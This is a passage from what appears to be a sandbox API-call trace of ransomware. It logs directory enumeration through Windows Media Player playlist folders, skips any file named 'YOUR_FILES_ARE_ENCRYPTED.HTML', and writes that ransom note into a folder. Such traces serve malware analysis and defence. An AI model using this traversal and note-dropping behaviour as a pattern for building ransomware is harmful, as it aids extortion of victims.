lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\05_Pictures_taken_in_the_last_month.wpl") returned 130 [0159.398] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", 
cAlternateFileName="06_PIC~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\06_Pictures_rated_4_or_5_stars.wpl") returned 125 [0159.399] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\07_TV_recorded_in_the_last_week.wpl") returned 126 [0159.399] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\08_Video_rated_at_4_or_5_stars.wpl") returned 125 [0159.399] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\09_Music_played_the_most.wpl") returned 119 [0159.399] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.399] 
lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\10_All_Music.wpl") returned 107 [0159.399] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0159.400] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\11_All_Pictures.wpl") returned 110 [0159.400] lstrcmpW 
(lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.400] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.400] lstrlenW (lpString=".wpl") returned 4 [0159.400] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.400] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0159.400] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\12_All_Video.wpl") returned 107 [0159.400] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.400] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.400] lstrlenW (lpString=".wpl") returned 4 [0159.400] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.400] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0159.400] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.401] 
wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0159.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\000080a3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0159.405] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.407] CloseHandle (hObject=0x5b0) returned 1 [0159.407] GetProcessHeap () returned 0x270000 [0159.408] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x746a1d0 | out: hHeap=0x270000) returned 1 [0159.408] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 1 [0159.408] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned 90 [0159.408] GetProcessHeap () returned 0x270000 [0159.408] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) 
returned 0x746a1d0 [0159.408] lstrcpyW (in: lpString1=0x746a1d0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" [0159.408] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*" [0159.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, 
lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\01_Music_auto_rated_at_5_stars.wpl") returned 125 [0159.411] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\02_Music_added_in_the_last_month.wpl") returned 127 [0159.411] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\03_Music_rated_at_4_or_5_stars.wpl") returned 125 [0159.411] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", 
cAlternateFileName="04_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\04_Music_played_in_the_last_month.wpl") returned 128 [0159.411] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\05_Pictures_taken_in_the_last_month.wpl") returned 130 [0159.412] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\06_Pictures_rated_4_or_5_stars.wpl") returned 125 [0159.412] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\07_TV_recorded_in_the_last_week.wpl") returned 126 [0159.412] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW 
(pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\08_Video_rated_at_4_or_5_stars.wpl") returned 125 [0159.412] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\09_Music_played_the_most.wpl") returned 119 [0159.412] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, 